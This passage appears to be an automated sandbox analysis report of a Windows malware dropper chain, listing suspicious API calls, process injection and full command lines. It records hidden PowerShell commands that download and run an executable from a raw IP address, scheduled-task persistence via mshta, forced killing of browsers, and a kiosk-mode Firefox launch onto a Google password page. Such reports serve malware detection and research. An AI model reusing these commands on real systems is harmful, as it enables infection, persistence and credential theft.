N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1284 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
PID 1284 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
PID 1284 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
PID 2892 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2892 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2892 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4276 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
PID 4276 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
PID 4276 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
PID 2076 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\mshta.exe
PID 2076 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\mshta.exe
PID 2076 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\mshta.exe
PID 1836 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1836 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1836 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3484 wrote to memory of 868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4276 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4276 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4680 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4680 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4680 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 1160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 1160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 1160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1160 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1160 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1160 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 3780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
PID 868 wrote to memory of 3780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
PID 868 wrote to memory of 3780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
PID 4680 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4680 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4680 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4680 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4680 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4680 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1484 wrote to memory of 3640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 3640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 3640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
PID 4276 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
PID 4276 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
PID 3640 wrote to memory of 916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 3640 wrote to memory of 916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 3640 wrote to memory of 916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 4276 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe

"C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE

"C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "aPbClmaJWPb" /tr "mshta \"C:\Temp\iH0BXcodL.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\iH0BXcodL.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe

"C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1480 -ip 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 812

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe

"C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe"

C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe

"C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe

"C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe"

C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe

"C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe

"C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1868 -prefMapHandle 1860 -prefsLen 27376 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8990b8ae-a833-4c44-841c-ae4a0209ca20} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28296 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0b6ece7-2e68-4d23-b9c6-0fdff8149e46} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -childID 1 -isForBrowser -prefsHandle 3216 -prefMapHandle 3272 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5db327ae-8c4b-4101-bb8e-4cdbd912e4cd} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

